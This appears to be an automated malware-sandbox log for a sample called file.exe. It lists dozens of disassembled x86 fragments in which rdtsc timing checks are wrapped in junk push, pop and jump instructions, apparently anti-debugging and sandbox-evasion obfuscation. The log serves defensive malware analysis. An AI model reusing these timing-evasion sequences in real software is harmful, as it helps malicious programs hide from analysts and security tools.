Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 684243 second address: 684249 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 684249 second address: 684293 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC742h 0x00000007 jmp 00007FCBA46BC747h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f je 00007FCBA46BC748h 0x00000015 jmp 00007FCBA46BC742h 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68386C second address: 68388C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68388C second address: 68389B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 jnc 00007FCBA46BC736h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 683E1A second address: 683E20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 683E20 second address: 683E24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 683F65 second address: 683F75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FCBA4817E76h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 683F75 second address: 683F87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA46BC73Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68F441 second address: 68F44E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FCBA4817E76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68F44E second address: 68F453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68F453 second address: 68F45F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007FCBA4817E76h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68F45F second address: 68F463 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68F8A8 second address: 68F8B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FCBA4817E76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68F8B2 second address: 68F8BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68F8BC second address: 68F8CB instructions: 0x00000000 rdtsc 0x00000002 jg 00007FCBA4817E76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68FA30 second address: 68FA34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68FA34 second address: 68FA38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68FA38 second address: 68FA3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68FA3E second address: 68FA47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68FCD4 second address: 68FCD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6900E9 second address: 6900F8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 js 00007FCBA4817E76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69110C second address: 691112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 691112 second address: 691116 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68F018 second address: 68F02E instructions: 0x00000000 rdtsc 0x00000002 js 00007FCBA46BC736h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007FCBA46BC736h 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68F02E second address: 68F048 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FCBA4817E7Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6938B3 second address: 6938B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6938B9 second address: 6938BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69A9A6 second address: 69A9E4 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FCBA46BC746h 0x00000008 push edi 0x00000009 jmp 00007FCBA46BC742h 0x0000000e pop edi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007FCBA46BC73Bh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69A9E4 second address: 69A9EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FCBA4817E76h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D9BD2 second address: 5D9BF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jno 00007FCBA46BC73Ch 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007FCBA46BC742h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69A3BB second address: 69A3EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FCBA4817E7Bh 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jc 00007FCBA4817E76h 0x00000015 jmp 00007FCBA4817E85h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69A3EB second address: 69A410 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FCBA46BC745h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69A410 second address: 69A426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA4817E81h 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A73EB second address: 6A73FB instructions: 0x00000000 rdtsc 0x00000002 js 00007FCBA46BC742h 0x00000008 jp 00007FCBA46BC736h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A7012 second address: 6A701C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FCBA4817E76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A701C second address: 6A7020 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A713A second address: 6A714A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007FCBA4817E76h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A714A second address: 6A714E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A714E second address: 6A7152 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A7152 second address: 6A716D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FCBA46BC73Bh 0x0000000f jnl 00007FCBA46BC736h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6AA569 second address: 6AA58E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ecx 0x00000008 js 00007FCBA4817E92h 0x0000000e push edi 0x0000000f jmp 00007FCBA4817E84h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6B79D4 second address: 6B79FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FCBA46BC736h 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FCBA46BC749h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C7359 second address: 6C737B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA4817E81h 0x00000009 jng 00007FCBA4817E76h 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C737B second address: 6C7389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA46BC73Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C5DA0 second address: 6C5DA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C61E3 second address: 6C61FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 jmp 00007FCBA46BC741h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C61FD second address: 6C6216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FCBA4817E81h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C6375 second address: 6C6389 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCBA46BC73Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C6389 second address: 6C63A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA4817E7Eh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C63A3 second address: 6C63B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007FCBA46BC736h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C63B0 second address: 6C63BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FCBA4817E76h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C63BC second address: 6C63C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C63C0 second address: 6C63C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C6534 second address: 6C6539 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C6539 second address: 6C653F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C653F second address: 6C6545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C6684 second address: 6C669C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ebx 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a jl 00007FCBA4817E76h 0x00000010 popad 0x00000011 popad 0x00000012 push esi 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C8BAA second address: 6C8BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C8BB0 second address: 6C8BB6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CC05C second address: 6CC061 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CC1A7 second address: 6CC1B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FCBA4817E76h 0x0000000a jnc 00007FCBA4817E76h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D70BD second address: 6D70C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D70C9 second address: 6D70DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FCBA4817E76h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6DA6B5 second address: 6DA6D9 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCBA46BC740h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jng 00007FCBA46BC73Ch 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D80D3 second address: 5D80D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D80D9 second address: 5D80E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jnp 00007FCBA46BC736h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D43C4 second address: 6D43FB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FCBA4817E9Fh 0x00000008 jmp 00007FCBA4817E81h 0x0000000d jmp 00007FCBA4817E88h 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E6623 second address: 6E6627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EE5D3 second address: 6EE5D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EE5D7 second address: 6EE604 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCBA46BC747h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007FCBA46BC736h 0x00000015 jns 00007FCBA46BC736h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6ED35D second address: 6ED363 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6ED363 second address: 6ED39C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jbe 00007FCBA46BC736h 0x0000000f pushad 0x00000010 popad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 jo 00007FCBA46BC736h 0x00000019 popad 0x0000001a jnl 00007FCBA46BC74Fh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6ED66D second address: 6ED683 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007FCBA4817E76h 0x00000010 jns 00007FCBA4817E76h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6ED812 second address: 6ED82B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCBA46BC73Eh 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6ED82B second address: 6ED840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FCBA4817E76h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d je 00007FCBA4817E7Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6ED9E2 second address: 6EDA0D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCBA46BC743h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FCBA46BC740h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EDA0D second address: 6EDA11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EDD0D second address: 6EDD3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC747h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FCBA46BC73Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EDD3A second address: 6EDD54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E84h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EE2F3 second address: 6EE338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007FCBA46BC73Ch 0x0000000b jmp 00007FCBA46BC746h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push edi 0x00000015 pop edi 0x00000016 pushad 0x00000017 popad 0x00000018 push edi 0x00000019 pop edi 0x0000001a popad 0x0000001b push ecx 0x0000001c jmp 00007FCBA46BC741h 0x00000021 pop ecx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EE338 second address: 6EE33E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EE33E second address: 6EE344 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EE344 second address: 6EE348 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F16D9 second address: 6F16DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F16DD second address: 6F16FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FCBA4817E76h 0x00000009 jmp 00007FCBA4817E7Eh 0x0000000e jg 00007FCBA4817E76h 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F16FE second address: 6F1704 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F3F65 second address: 6F3F6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F42D0 second address: 6F430D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pushad 0x00000007 jmp 00007FCBA46BC73Ch 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f jnl 00007FCBA46BC736h 0x00000015 popad 0x00000016 popad 0x00000017 nop 0x00000018 mov dx, cx 0x0000001b pushad 0x0000001c mov cx, bx 0x0000001f mov eax, ecx 0x00000021 popad 0x00000022 push 00000004h 0x00000024 mov dx, 8262h 0x00000028 push F9A4D2BAh 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 jbe 00007FCBA46BC736h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F5BB5 second address: 6F5BBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F5BBB second address: 6F5BC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F1BF2 second address: 49F1BF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F1BF6 second address: 49F1BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F1BFC second address: 49F1ADD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E7Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ret 0x0000000a nop 0x0000000b xor esi, eax 0x0000000d lea eax, dword ptr [ebp-10h] 0x00000010 push eax 0x00000011 call 00007FCBA8E0019Dh 0x00000016 mov edi, edi 0x00000018 pushad 0x00000019 mov cl, 20h 0x0000001b push eax 0x0000001c push edx 0x0000001d pushfd 0x0000001e jmp 00007FCBA4817E89h 0x00000023 or si, 25B6h 0x00000028 jmp 00007FCBA4817E81h 0x0000002d popfd 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F1ADD second address: 49F1B09 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FCBA46BC740h 0x00000008 add cl, FFFFFFD8h 0x0000000b jmp 00007FCBA46BC73Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
